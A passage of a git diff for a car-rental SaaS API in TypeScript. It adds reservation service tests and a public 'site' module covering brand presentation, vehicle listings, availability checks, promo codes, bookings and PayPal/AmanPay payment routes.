prisma.reservationInsurance.update({ where: { id: ins.id }, data: { totalCharge: ins.totalCharge } }) + ), + ...driverUpdates.map((d) => + prisma.additionalDriver.update({ where: { id: d.id }, data: { totalCharge: d.totalCharge } }) + ), + ]) + } else { + const invalid = requested.filter((f) => !returnFields.includes(f)) + if (invalid.length > 0) throw new AppError('Only return details can be edited after vehicle return', 400, 'invalid_fields') + + await prisma.reservation.update({ + where: { id: reservation.id }, + data: { + returnLocation: body.returnLocation !== undefined ? normalizeOptionalString(body.returnLocation) : reservation.returnLocation, + damageChargeAmount: body.damageChargeAmount !== undefined ? body.damageChargeAmount : reservation.damageChargeAmount, + damageChargeNote: body.damageChargeNote !== undefined ? normalizeOptionalString(body.damageChargeNote) : reservation.damageChargeNote, + }, + }) + } + + return repo.findById(id, companyId).then(serializeReservationForDashboard) +} diff --git a/apps/api/src/modules/reservations/reservation.test.ts b/apps/api/src/modules/reservations/reservation.test.ts new file mode 100644 index 0000000..418345a --- /dev/null +++ b/apps/api/src/modules/reservations/reservation.test.ts @@ -0,0 +1,342 @@ +import { describe, it, expect, vi, beforeEach } from 'vitest' +import { AppError } from '../../http/errors' + +// ── repo mock ────────────────────────────────────────────────────────────── +vi.mock('./reservation.repo', () => ({ + findMany: vi.fn(), + findById: vi.fn(), + findByIdSimple: vi.fn(), + findByIdWithRelations: vi.fn(), + findByIdForCheckout: vi.fn(), + findForLicenseCheck: vi.fn(), + findForClose: vi.fn(), + findForInspection: vi.fn(), + findConflict: vi.fn(), + create: vi.fn(), + updateById: vi.fn(), + findActiveOffer: vi.fn(), + incrementOfferRedemption: vi.fn(), + findVehicle: vi.fn(), + findCustomer: vi.fn(), + findCustomerById: vi.fn(), + updateVehicleStatus: vi.fn(), + findCompanyWithBrand: vi.fn(), + findBrandLocale: vi.fn(), + findInspections: vi.fn(), + findAdditionalDriver: vi.fn(), + updateAdditionalDriver: vi.fn(), +})) + +vi.mock('./reservation.pricing.service', () => ({ + applyPricingRules: vi.fn(), + calculateUpdatedInsuranceCharge: vi.fn(), + calculateUpdatedAdditionalDriverCharge: vi.fn(), +})) + +vi.mock('./reservation.insurance.service', () => ({ + applyInsurancesToReservation: vi.fn(), +})) + +vi.mock('./reservation.additional-driver.service', () => ({ + applyAdditionalDriversToReservation: vi.fn(), + approveAdditionalDriver: vi.fn(), +})) + +vi.mock('../../services/licenseValidationService', () => ({ + validateAndFlagLicense: vi.fn().mockResolvedValue(undefined), + validateLicense: vi.fn(), +})) + +vi.mock('../../services/notificationService', () => ({ + sendNotification: vi.fn().mockResolvedValue(undefined), + sendTransactionalEmail: vi.fn().mockResolvedValue(undefined), +})) + +vi.mock('../../lib/prisma', () => ({ + prisma: { + reservation: { update: vi.fn() }, + damageInspection: { upsert: vi.fn() }, + damageReport: { upsert: vi.fn() }, + }, +})) + +vi.mock('./reservation.presenter', () => ({ + serializeReservationForDashboard: vi.fn((r) => r), + parseReservationExtras: vi.fn(() => ({})), + buildReservationWorkflow: vi.fn(), + normalizeOptionalString: vi.fn((s) => s), +})) + +import * as repo from './reservation.repo' +import * as pricingService from './reservation.pricing.service' +import * as insuranceService from './reservation.insurance.service' +import * as additionalDriverService from './reservation.additional-driver.service' +import { validateLicense } from '../../services/licenseValidationService' +import { buildReservationWorkflow } from './reservation.presenter' +import { createReservation } from './reservation.service' +import { confirmReservation, checkinReservation, checkoutReservation, closeReservation } from './reservation.lifecycle.service' +import { approveAdditionalDriver } from './reservation.additional-driver.service' + +const COMPANY = 'company-1' +const RES_ID = 'reservation-1' + +function makeVehicle(overrides: object = {}) { + return { id: 'vehicle-1', dailyRate: 100, status: 'AVAILABLE', isPublished: true, mileage: 50000, ...overrides } +} + +function makeReservation(overrides: object = {}) { + return { + id: RES_ID, + companyId: COMPANY, + vehicleId: 'vehicle-1', + customerId: 'customer-1', + status: 'DRAFT', + startDate: new Date('2025-06-01'), + endDate: new Date('2025-06-04'), + totalDays: 3, + dailyRate: 100, + depositAmount: 0, + discountAmount: 0, + totalAmount: 300, + additionalDrivers: [], + insurances: [], + customer: { firstName: 'Ali', lastName: 'Ben', email: 'ali@test.com', licenseExpiry: null, licenseValidationStatus: 'APPROVED' }, + vehicle: { year: 2022, make: 'Toyota', model: 'Camry' }, + extras: {}, + ...overrides, + } +} + +beforeEach(() => { + vi.clearAllMocks() +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('createReservation', () => { + it('creates a reservation and returns it', async () => { + vi.mocked(repo.findVehicle).mockResolvedValue(makeVehicle()) + vi.mocked(repo.findCustomer).mockResolvedValue({ id: 'customer-1' } as any) + vi.mocked(repo.findConflict).mockResolvedValue(null) + vi.mocked(repo.findActiveOffer).mockResolvedValue(null) + vi.mocked(pricingService.applyPricingRules).mockResolvedValue({ applied: [], total: 0 }) + vi.mocked(repo.create).mockResolvedValue(makeReservation() as any) + + const result = await createReservation(COMPANY, { + vehicleId: 'vehicle-1', + customerId: 'customer-1', + startDate: '2025-06-01T00:00:00.000Z', + endDate: '2025-06-04T00:00:00.000Z', + depositAmount: 0, + selectedInsurancePolicyIds: [], + additionalDrivers: [], + }) + + expect(repo.create).toHaveBeenCalledOnce() + expect(result.id).toBe(RES_ID) + }) + + it('throws conflict error when vehicle is unavailable', async () => { + vi.mocked(repo.findVehicle).mockResolvedValue(makeVehicle()) + vi.mocked(repo.findCustomer).mockResolvedValue({ id: 'customer-1' } as any) + vi.mocked(repo.findConflict).mockResolvedValue({ id: 'other-res' } as any) + + await expect( + createReservation(COMPANY, { + vehicleId: 'vehicle-1', + customerId: 'customer-1', + startDate: '2025-06-01T00:00:00.000Z', + endDate: '2025-06-04T00:00:00.000Z', + selectedInsurancePolicyIds: [], + additionalDrivers: [], + }), + ).rejects.toThrow('Vehicle is not available for the selected dates') + + expect(repo.create).not.toHaveBeenCalled() + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('confirmReservation', () => { + it('confirms a DRAFT reservation', async () => { + const res = makeReservation({ status: 'DRAFT' }) + vi.mocked(repo.findByIdSimple).mockResolvedValue(res as any) + vi.mocked(repo.findForLicenseCheck).mockResolvedValue({ + ...res, + customer: { ...res.customer, licenseExpiry: null, licenseValidationStatus: 'APPROVED' }, + additionalDrivers: [], + } as any) + vi.mocked(validateLicense).mockReturnValue({ status: 'VALID', requiresApproval: false } as any) + vi.mocked(repo.updateById).mockResolvedValue({ ...res, status: 'CONFIRMED' } as any) + vi.mocked(repo.findCustomerById).mockResolvedValue({ email: 'ali@test.com', firstName: 'Ali' } as any) + vi.mocked(repo.findBrandLocale).mockResolvedValue({ defaultLocale: 'fr' } as any) + + const result = await confirmReservation(RES_ID, COMPANY) + + expect(repo.updateById).toHaveBeenCalledWith(RES_ID, { status: 'CONFIRMED' }) + expect((result as any).status).toBe('CONFIRMED') + }) + + it('rejects non-DRAFT reservation', async () => { + vi.mocked(repo.findByIdSimple).mockResolvedValue(makeReservation({ status: 'CONFIRMED' }) as any) + + await expect(confirmReservation(RES_ID, COMPANY)).rejects.toThrow('Only DRAFT reservations can be confirmed') + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('checkinReservation', () => { + it('transitions CONFIRMED → ACTIVE and marks vehicle RENTED', async () => { + const res = makeReservation({ status: 'CONFIRMED' }) + vi.mocked(repo.findByIdSimple).mockResolvedValue(res as any) + vi.mocked(repo.findForLicenseCheck).mockResolvedValue({ + ...res, + customer: { ...res.customer, licenseExpiry: null, licenseValidationStatus: 'APPROVED' }, + additionalDrivers: [], + } as any) + vi.mocked(validateLicense).mockReturnValue({ status: 'VALID', requiresApproval: false } as any) + vi.mocked(repo.updateById).mockResolvedValue({ ...res, status: 'ACTIVE' } as any) + vi.mocked(repo.updateVehicleStatus).mockResolvedValue(undefined as any) + + await checkinReservation(RES_ID, COMPANY, 55000) + + expect(repo.updateById).toHaveBeenCalledWith(RES_ID, expect.objectContaining({ status: 'ACTIVE', checkInMileage: 55000 })) + expect(repo.updateVehicleStatus).toHaveBeenCalledWith('vehicle-1', 'RENTED') + }) + + it('rejects non-CONFIRMED reservation', async () => { + vi.mocked(repo.findByIdSimple).mockResolvedValue(makeReservation({ status: 'ACTIVE' }) as any) + + await expect(checkinReservation(RES_ID, COMPANY)).rejects.toThrow('Only CONFIRMED reservations can be checked in') + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('checkoutReservation', () => { + it('transitions ACTIVE → COMPLETED and marks vehicle AVAILABLE', async () => { + const res = makeReservation({ status: 'ACTIVE' }) + vi.mocked(repo.findByIdForCheckout).mockResolvedValue(res as any) + vi.mocked(repo.updateById).mockResolvedValue({ ...res, status: 'COMPLETED' } as any) + vi.mocked(repo.updateVehicleStatus).mockResolvedValue(undefined as any) + vi.mocked(repo.findCustomerById).mockResolvedValue({ email: 'ali@test.com', firstName: 'Ali' } as any) + vi.mocked(repo.findCompanyWithBrand).mockResolvedValue({ name: 'TestCo', brand: { displayName: 'TestCo', defaultLocale: 'fr' } } as any) + + await checkoutReservation(RES_ID, COMPANY, 58000) + + expect(repo.updateById).toHaveBeenCalledWith(RES_ID, expect.objectContaining({ status: 'COMPLETED', checkOutMileage: 58000 })) + expect(repo.updateVehicleStatus).toHaveBeenCalledWith('vehicle-1', 'AVAILABLE', 58000) + }) + + it('rejects non-ACTIVE reservation', async () => { + vi.mocked(repo.findByIdForCheckout).mockResolvedValue(makeReservation({ status: 'CONFIRMED' }) as any) + + await expect(checkoutReservation(RES_ID, COMPANY)).rejects.toThrow('Only ACTIVE reservations can be checked out') + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('closeReservation', () => { + it('closes a COMPLETED reservation', async () => { + const res = makeReservation({ status: 'COMPLETED' }) + vi.mocked(repo.findForClose).mockResolvedValue(res as any) + vi.mocked(buildReservationWorkflow).mockReturnValue({ closed: false } as any) + const { prisma } = await import('../../lib/prisma') + vi.mocked(prisma.reservation.update).mockResolvedValue({ ...res, extras: { reservationClosedBy: 'Admin User' } } as any) + + await closeReservation(RES_ID, COMPANY, 'Admin User') + + expect(prisma.reservation.update).toHaveBeenCalledWith( + expect.objectContaining({ where: { id: RES_ID } }), + ) + }) + + it('rejects already closed reservation', async () => { + vi.mocked(repo.findForClose).mockResolvedValue(makeReservation({ status: 'COMPLETED' }) as any) + vi.mocked(buildReservationWorkflow).mockReturnValue({ closed: true } as any) + + await expect(closeReservation(RES_ID, COMPANY, 'Admin')).rejects.toThrow('already closed') + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('approveAdditionalDriver', () => { + it('calls through to the additional driver service', async () => { + vi.mocked(additionalDriverService.approveAdditionalDriver).mockResolvedValue({ id: 'driver-1', approvedAt: new Date() } as any) + + const result = await approveAdditionalDriver(RES_ID, 'driver-1', COMPANY, true, 'Looks good', 'Manager') + + expect(additionalDriverService.approveAdditionalDriver).toHaveBeenCalledWith(RES_ID, 'driver-1', COMPANY, true, 'Looks good', 'Manager') + expect((result as any).id).toBe('driver-1') + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('pricing rule application', () => { + it('applies pricing rules and adjusts totalAmount', async () => { + vi.mocked(repo.findVehicle).mockResolvedValue(makeVehicle({ dailyRate: 100 })) + vi.mocked(repo.findCustomer).mockResolvedValue({ id: 'customer-1' } as any) + vi.mocked(repo.findConflict).mockResolvedValue(null) + vi.mocked(repo.findActiveOffer).mockResolvedValue(null) + vi.mocked(pricingService.applyPricingRules).mockResolvedValue({ applied: [{ id: 'rule-1' }], total: 50 }) + vi.mocked(repo.create).mockResolvedValue(makeReservation({ totalAmount: 350 }) as any) + + await createReservation(COMPANY, { + vehicleId: 'vehicle-1', + customerId: 'customer-1', + startDate: '2025-06-01T00:00:00.000Z', + endDate: '2025-06-04T00:00:00.000Z', + selectedInsurancePolicyIds: [], + additionalDrivers: [], + }) + + expect(pricingService.applyPricingRules).toHaveBeenCalledOnce() + const createCall = vi.mocked(repo.create).mock.calls[0][0] as any + expect(createCall.pricingRulesApplied).toEqual([{ id: 'rule-1' }]) + expect(createCall.totalAmount).toBe(350) + }) +}) + +// ──────────────────────────────────────────────────────────────────────────── +describe('insurance application', () => { + it('calls applyInsurancesToReservation when insurance IDs are provided', async () => { + vi.mocked(repo.findVehicle).mockResolvedValue(makeVehicle()) + vi.mocked(repo.findCustomer).mockResolvedValue({ id: 'customer-1' } as any) + vi.mocked(repo.findConflict).mockResolvedValue(null) + vi.mocked(repo.findActiveOffer).mockResolvedValue(null) + vi.mocked(pricingService.applyPricingRules).mockResolvedValue({ applied: [], total: 0 }) + vi.mocked(repo.create).mockResolvedValue(makeReservation() as any) + vi.mocked(insuranceService.applyInsurancesToReservation).mockResolvedValue(undefined as any) + + await createReservation(COMPANY, { + vehicleId: 'vehicle-1', + customerId: 'customer-1', + startDate: '2025-06-01T00:00:00.000Z', + endDate: '2025-06-04T00:00:00.000Z', + selectedInsurancePolicyIds: ['policy-1', 'policy-2'], + additionalDrivers: [], + }) + + expect(insuranceService.applyInsurancesToReservation).toHaveBeenCalledWith( + RES_ID, COMPANY, ['policy-1', 'policy-2'], 3, 300, + ) + }) + + it('skips insurance call when no IDs provided', async () => { + vi.mocked(repo.findVehicle).mockResolvedValue(makeVehicle()) + vi.mocked(repo.findCustomer).mockResolvedValue({ id: 'customer-1' } as any) + vi.mocked(repo.findConflict).mockResolvedValue(null) + vi.mocked(repo.findActiveOffer).mockResolvedValue(null) + vi.mocked(pricingService.applyPricingRules).mockResolvedValue({ applied: [], total: 0 }) + vi.mocked(repo.create).mockResolvedValue(makeReservation() as any) + + await createReservation(COMPANY, { + vehicleId: 'vehicle-1', + customerId: 'customer-1', + startDate: '2025-06-01T00:00:00.000Z', + endDate: '2025-06-04T00:00:00.000Z', + selectedInsurancePolicyIds: [], + additionalDrivers: [], + }) + + expect(insuranceService.applyInsurancesToReservation).not.toHaveBeenCalled() + }) +}) diff --git a/apps/api/src/modules/site/site.presenter.ts b/apps/api/src/modules/site/site.presenter.ts new file mode 100644 index 0000000..1d58f16 --- /dev/null +++ b/apps/api/src/modules/site/site.presenter.ts @@ -0,0 +1,39 @@ +export function presentBrand(company: { + id: string; slug: string; name: string; phone: string | null; brand: any +}) { + const brand = company.brand + return { + company: { id: company.id, slug: company.slug, name: company.name, phone: company.phone }, + brand: brand ? { + displayName: brand.displayName, + tagline: brand.tagline, + logoUrl: brand.logoUrl, + faviconUrl: brand.faviconUrl, + heroImageUrl: brand.heroImageUrl, + primaryColor: brand.primaryColor, + accentColor: brand.accentColor, + subdomain: brand.subdomain, + customDomain: brand.customDomain, + customDomainVerified: brand.customDomainVerified, + customDomainAddedAt: brand.customDomainAddedAt, + publicEmail: brand.publicEmail, + publicPhone: brand.publicPhone, + publicAddress: brand.publicAddress, + publicCity: brand.publicCity, + publicCountry: brand.publicCountry, + websiteUrl: brand.websiteUrl, + whatsappNumber: brand.whatsappNumber, + facebookUrl: brand.facebookUrl, + instagramUrl: brand.instagramUrl, + defaultLocale: brand.defaultLocale, + defaultCurrency: brand.defaultCurrency, + paypalEmail: brand.paypalEmail, + paypalMerchantId: brand.paypalMerchantId, + paymentMethodsEnabled: brand.paymentMethodsEnabled, + isListedOnMarketplace: brand.isListedOnMarketplace, + marketplaceRating: brand.marketplaceRating, + homePageConfig: brand.homePageConfig, + menuConfig: brand.menuConfig, + } : null, + } +} diff --git a/apps/api/src/modules/site/site.repo.ts b/apps/api/src/modules/site/site.repo.ts new file mode 100644 index 0000000..af990ec --- /dev/null +++ b/apps/api/src/modules/site/site.repo.ts @@ -0,0 +1,101 @@ +import { prisma } from '../../lib/prisma' + +export async function findCompanyBySlug(slug: string) { + return prisma.company.findFirstOrThrow({ + where: { slug, status: { in: ['ACTIVE', 'TRIALING', 'PAST_DUE', 'SUSPENDED'] } }, + include: { brand: true, contractSettings: true }, + }) +} + +export async function findPublishedVehicles(companyId: string) { + return prisma.vehicle.findMany({ + where: { companyId, isPublished: true }, + orderBy: { createdAt: 'desc' }, + }) +} + +export async function findVehicleById(vehicleId: string, companyId: string) { + return prisma.vehicle.findFirstOrThrow({ + where: { id: vehicleId, companyId, isPublished: true }, + }) +} + +export async function findActiveOffers(companyId: string) { + return prisma.offer.findMany({ + where: { companyId, isActive: true, validFrom: { lte: new Date() }, validUntil: { gte: new Date() } }, + orderBy: [{ isFeatured: 'desc' }, { createdAt: 'desc' }], + }) +} + +export async function findInsurancePolicies(companyId: string) { + return prisma.insurancePolicy.findMany({ + where: { companyId, isActive: true }, + orderBy: [{ isRequired: 'desc' }, { sortOrder: 'asc' }, { name: 'asc' }], + }) +} + +export async function findOfferByPromoCode(companyId: string, code: string) { + return prisma.offer.findFirst({ + where: { companyId, promoCode: code, isActive: true, validFrom: { lte: new Date() }, validUntil: { gte: new Date() } }, + }) +} + +export async function upsertCustomer(companyId: string, data: { + email: string; firstName: string; lastName: string; phone?: string | null + driverLicense?: string | null; dateOfBirth?: string | null; licenseExpiry?: string | null + licenseIssuedAt?: string | null; nationality?: string | null +}) { + const parsed = { + dateOfBirth: data.dateOfBirth ? new Date(data.dateOfBirth) : null, + licenseExpiry: data.licenseExpiry ? new Date(data.licenseExpiry) : null, + licenseIssuedAt: data.licenseIssuedAt ? new Date(data.licenseIssuedAt) : null, + } + return prisma.customer.upsert({ + where: { companyId_email: { companyId, email: data.email } }, + create: { companyId, firstName: data.firstName, lastName: data.lastName, email: data.email, phone: data.phone ?? null, driverLicense: data.driverLicense ?? null, nationality: data.nationality ?? null, ...parsed }, + update: { firstName: data.firstName, lastName: data.lastName, phone: data.phone ?? null, driverLicense: data.driverLicense ?? null, nationality: data.nationality ?? null, ...parsed }, + }) +} + +export async function createReservation(data: object) { + return prisma.reservation.create({ data: data as any }) +} + +export async function findReservationWithDetails(reservationId: string) { + return prisma.reservation.findUniqueOrThrow({ + where: { id: reservationId }, + include: { insurances: true, additionalDrivers: true }, + }) +} + +export async function findBooking(reservationId: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ + where: { id: reservationId, companyId }, + include: { vehicle: true, customer: true }, + }) +} + +export async function findReservationForPayment(reservationId: string, companyId: string) { + return prisma.reservation.findFirstOrThrow({ + where: { id: reservationId, companyId }, + include: { vehicle: true, customer: true, additionalDrivers: true }, + }) +} + +export async function createRentalPayment(data: { + companyId: string; reservationId: string; amount: number; currency: string + paymentProvider: string; amanpayTransactionId?: string | null; paypalCaptureId?: string | null +}) { + return prisma.rentalPayment.create({ + data: { ...data, paymentProvider: data.paymentProvider as any, status: 'PENDING', type: 'CHARGE' }, + }) +} + +export async function findPaymentByPaypalOrderId(paypalOrderId: string, companyId: string) { + return prisma.rentalPayment.findFirstOrThrow({ where: { paypalCaptureId: paypalOrderId, companyId } }) +} + +export async function capturePaypalPayment(paymentId: string, captureId: string, reservationId: string, amount: number) { + await prisma.rentalPayment.update({ where: { id: paymentId }, data: { status: 'SUCCEEDED', paidAt: new Date(), paypalCaptureId: captureId } }) + await prisma.reservation.update({ where: { id: reservationId }, data: { paymentStatus: 'PAID', paidAmount: { increment: amount } } }) +} diff --git a/apps/api/src/modules/site/site.routes.ts b/apps/api/src/modules/site/site.routes.ts new file mode 100644 index 0000000..e4a3d21 --- /dev/null +++ b/apps/api/src/modules/site/site.routes.ts @@ -0,0 +1,154 @@ +import { Router } from 'express' +import { parseBody, parseParams } from '../../http/validate' +import { ok, created } from '../../http/respond' +import { isDatabaseUnavailableError } from '../../lib/isDatabaseUnavailable' +import * as service from './site.service' +import { + slugParamSchema, bookingParamSchema, + availabilitySchema, validateCodeSchema, bookSchema, paySchema, capturePaypalSchema, contactSchema, +} from './site.schemas' + +const router = Router() + +router.get('/platform/homepage', async (_req, res, next) => { + try { + ok(res, await service.getPlatformHomepage()) + } catch (err) { next(err) } +}) + +router.get('/:slug/brand', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + ok(res, await service.getBrand(slug)) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.json({ data: { company: { id: 'demo', slug: req.params.slug, name: 'Demo Company', phone: null }, brand: null } }) + } + next(err) + } +}) + +router.get('/:slug/vehicles', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + ok(res, await service.getPublicVehicles(slug)) + } catch (err) { + if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) + next(err) + } +}) + +router.get('/:slug/vehicles/:id', async (req, res, next) => { + try { + const { slug, id } = parseParams(bookingParamSchema, req) + ok(res, await service.getVehicleDetail(slug, id)) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.status(503).json({ error: 'database_unavailable', message: 'Vehicle details are temporarily unavailable', statusCode: 503 }) + } + next(err) + } +}) + +router.get('/:slug/offers', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + ok(res, await service.getOffers(slug)) + } catch (err) { + if (isDatabaseUnavailableError(err)) return res.json({ data: [] }) + next(err) + } +}) + +router.get('/:slug/booking-options', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + ok(res, await service.getBookingOptions(slug)) + } catch (err) { + if (isDatabaseUnavailableError(err)) return res.json({ data: { insurancePolicies: [], contractSettings: null } }) + next(err) + } +}) + +router.post('/:slug/availability', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + const { vehicleId, startDate, endDate } = parseBody(availabilitySchema, req) + ok(res, await service.checkAvailability(slug, vehicleId, startDate, endDate)) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.status(503).json({ error: 'database_unavailable', message: 'Availability checks are temporarily unavailable', statusCode: 503 }) + } + next(err) + } +}) + +router.post('/:slug/book/validate-code', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + const { code } = parseBody(validateCodeSchema, req) + ok(res, await service.validatePromoCode(slug, code)) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.status(503).json({ error: 'database_unavailable', message: 'Promo code validation is temporarily unavailable', statusCode: 503 }) + } + next(err) + } +}) + +router.post('/:slug/book', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + const body = parseBody(bookSchema, req) + const result = await service.createBooking(slug, body) + created(res, result) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.status(503).json({ error: 'database_unavailable', message: 'Booking is temporarily unavailable', statusCode: 503 }) + } + next(err) + } +}) + +router.get('/:slug/booking/:id', async (req, res, next) => { + try { + const { slug, id } = parseParams(bookingParamSchema, req) + ok(res, await service.getBooking(slug, id)) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.status(503).json({ error: 'database_unavailable', message: 'Booking details are temporarily unavailable', statusCode: 503 }) + } + next(err) + } +}) + +router.post('/:slug/booking/:id/pay', async (req, res, next) => { + try { + const { slug, id } = parseParams(bookingParamSchema, req) + const body = parseBody(paySchema, req) + ok(res, await service.initPayment(slug, id, body)) + } catch (err) { + if (isDatabaseUnavailableError(err)) { + return res.status(503).json({ error: 'database_unavailable', message: 'Payment initiation is temporarily unavailable', statusCode: 503 }) + } + next(err) + } +}) + +router.post('/:slug/booking/:id/capture-paypal', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + const { paypalOrderId } = parseBody(capturePaypalSchema, req) + ok(res, await service.capturePaypal(slug, paypalOrderId)) + } catch (err) { next(err) } +}) + +router.post('/:slug/contact', async (req, res, next) => { + try { + const { slug } = parseParams(slugParamSchema, req) + const body = parseBody(contactSchema, req) + ok(res, await service.handleContact(slug, body)) + } catch (err) { next(err) } +}) + +export default router diff --git a/apps/api/src/modules/site/site.schemas.ts b/apps/api/src/modules/site/site.schemas.ts new file mode 100644 index 0000000..352c2e1 --- /dev/null +++ b/apps/api/src/modules/site/site.schemas.ts @@ -0,0 +1,58 @@ +import { z } from 'zod' + +export const slugParamSchema = z.object({ slug: z.string() }) +export const bookingParamSchema = z.object({ slug: z.string(), id: z.string() }) + +export const availabilitySchema = z.object({ + vehicleId: z.string().cuid(), + startDate: z.string().datetime(), + endDate: z.string().datetime(), +}) + +export const validateCodeSchema = z.object({ code: z.string().min(1) }) + +export const bookSchema = z.object({ + vehicleId: z.string().cuid(), + startDate: z.string().datetime(), + endDate: z.string().datetime(), + firstName: z.string().min(1), + lastName: z.string().min(1), + email: z.string().email(), + phone: z.string().optional(), + driverLicense: z.string().optional(), + dateOfBirth: z.string().datetime().optional(), + licenseExpiry: z.string().datetime().optional(), + licenseIssuedAt: z.string().datetime().optional(), + nationality: z.string().optional(), + offerId: z.string().cuid().optional(), + promoCodeUsed: z.string().optional(), + notes: z.string().optional(), + source: z.enum(['PUBLIC_SITE', 'MARKETPLACE']).default('PUBLIC_SITE'), + selectedInsurancePolicyIds: z.array(z.string()).default([]), + additionalDrivers: z.array(z.object({ + firstName: z.string().min(1), + lastName: z.string().min(1), + email: z.string().email().optional(), + phone: z.string().optional(), + driverLicense: z.string().min(1), + licenseExpiry: z.string().datetime().optional(), + licenseIssuedAt: z.string().datetime().optional(), + dateOfBirth: z.string().datetime().optional(), + nationality: z.string().optional(), + })).default([]), +}) + +export const paySchema = z.object({ + provider: z.enum(['AMANPAY', 'PAYPAL']), + currency: z.enum(['MAD', 'USD', 'EUR']).default('MAD'), + successUrl: z.string().url(), + failureUrl: z.string().url(), +}) + +export const capturePaypalSchema = z.object({ paypalOrderId: z.string() }) + +export const contactSchema = z.object({ + name: z.string().min(1), + email: z.string().email(), + message: z.string().min(1), +}) diff --git a/apps/api/src/modules/site/site.service.ts b/apps/api/src/modules/site/site.service.ts new file mode 100644 index 0000000..46e8f74 --- /dev/null +++ b/apps/api/src/modules/site/site.service.ts @@ -0,0 +1,254 @@ +import { AppError, NotFoundError } from '../../http/errors' +import { getVehicleAvailabilitySummary } from '../../services/vehicleAvailabilityService' +import { applyInsurancesToReservation } from '../../services/insuranceService' +import { applyAdditionalDriversToReservation } from '../../services/additionalDriverService' +import { applyPricingRules } from '../../services/pricingRuleService' +import { validateLicense, validateAndFlagLicense } from '../../services/licenseValidationService' +import { getMarketplaceHomepageContent } from '../../services/platformContentService' +import * as amanpay from '../../services/amanpayService' +import * as paypal from '../../services/paypalService' +import * as repo from './site.repo' +import { presentBrand } from './site.presenter' + +export async function getPlatformHomepage() { + return getMarketplaceHomepageContent() +} + +export async function getBrand(slug: string) { + const company = await repo.findCompanyBySlug(slug) + return presentBrand(company) +} + +export async function getPublicVehicles(slug: string) { + const company = await repo.findCompanyBySlug(slug) + const vehicles = await repo.findPublishedVehicles(company.id) + return Promise.all( + vehicles.map(async (v) => { + const a = await getVehicleAvailabilitySummary(v.id) + return { ...v, availability: a.available, availabilityStatus: a.status, nextAvailableAt: a.nextAvailableAt } + }), + ) +} + +export async function getVehicleDetail(slug: string, vehicleId: string) { + const company = await repo.findCompanyBySlug(slug) + const vehicle = await repo.findVehicleById(vehicleId, company.id) + const a = await getVehicleAvailabilitySummary(vehicle.id) + return { ...vehicle, availability: a.available, availabilityStatus: a.status, nextAvailableAt: a.nextAvailableAt } +} + +export async function getOffers(slug: string) { + const company = await repo.findCompanyBySlug(slug) + return repo.findActiveOffers(company.id) +} + +export async function getBookingOptions(slug: string) { + const company = await repo.findCompanyBySlug(slug) + const insurancePolicies = await repo.findInsurancePolicies(company.id) + return { insurancePolicies, contractSettings: company.contractSettings } +} + +export async function checkAvailability(slug: string, vehicleId: string, startDate: string, endDate: string) { + await repo.findCompanyBySlug(slug) + const availability = await getVehicleAvailabilitySummary(vehicleId, { + range: { startDate: new Date(startDate), endDate: new Date(endDate) }, + }) + return { available: availability.available, nextAvailableAt: availability.nextAvailableAt } +} + +export async function validatePromoCode(slug: string, code: string) { + const company = await repo.findCompanyBySlug(slug) + const offer = await repo.findOfferByPromoCode(company.id, code) + if (!offer) throw new NotFoundError('Promo code not found or expired') + return offer +} + +export async function createBooking(slug: string, body: { + vehicleId: string; startDate: string; endDate: string + firstName: string; lastName: string; email: string; phone?: string + driverLicense?: string; dateOfBirth?: string; licenseExpiry?: string; licenseIssuedAt?: string; nationality?: string + offerId?: string; promoCodeUsed?: string; notes?: string; source?: string + selectedInsurancePolicyIds?: string[]; additionalDrivers?: any[] +}) { + const company = await repo.findCompanyBySlug(slug) + const vehicle = await repo.findVehicleById(body.vehicleId, company.id) + + const start = new Date(body.startDate) + const end = new Date(body.endDate) + if (end <= start) throw new AppError('End date must be after start date', 400, 'invalid_dates') + + const availability = await getVehicleAvailabilitySummary(vehicle.id, { range: { startDate: start, endDate: end } }) + if (!availability.available) { + throw new AppError('Vehicle is not available for the selected dates', 409, 'unavailable', { + nextAvailableAt: availability.nextAvailableAt?.toISOString() ?? null, + }) + } + + const customer = await repo.upsertCustomer(company.id, { + email: body.email, firstName: body.firstName, lastName: body.lastName, phone: body.phone, + driverLicense: body.driverLicense, dateOfBirth: body.dateOfBirth, + licenseExpiry: body.licenseExpiry, licenseIssuedAt: body.licenseIssuedAt, nationality: body.nationality, + }) + + const totalDays = Math.max(1, Math.ceil((end.getTime() - start.getTime()) / 86_400_000)) + const baseAmount = vehicle.dailyRate * totalDays + + let discountAmount = 0 + if (body.promoCodeUsed) { + const offer = await repo.findOfferByPromoCode(company.id, body.promoCodeUsed) + if (offer) { + if (offer.type === 'PERCENTAGE') discountAmount = Math.round(baseAmount * offer.discountValue / 100) + else if (offer.type === 'FIXED_AMOUNT') discountAmount = offer.discountValue + else if (offer.type === 'FREE_DAY') discountAmount = vehicle.dailyRate * offer.discountValue + } + } + + const additionalDriversList = body.additionalDrivers ?? [] + const { applied, total: pricingRulesTotal } = await applyPricingRules( + company.id, customer.id, additionalDriversList as any[], vehicle.dailyRate, totalDays, + ) + + const primaryLicenseResult = validateLicense(body.licenseExpiry ? new Date(body.licenseExpiry) : null) + if (primaryLicenseResult.status === 'EXPIRED') { + throw new AppError('The primary driver 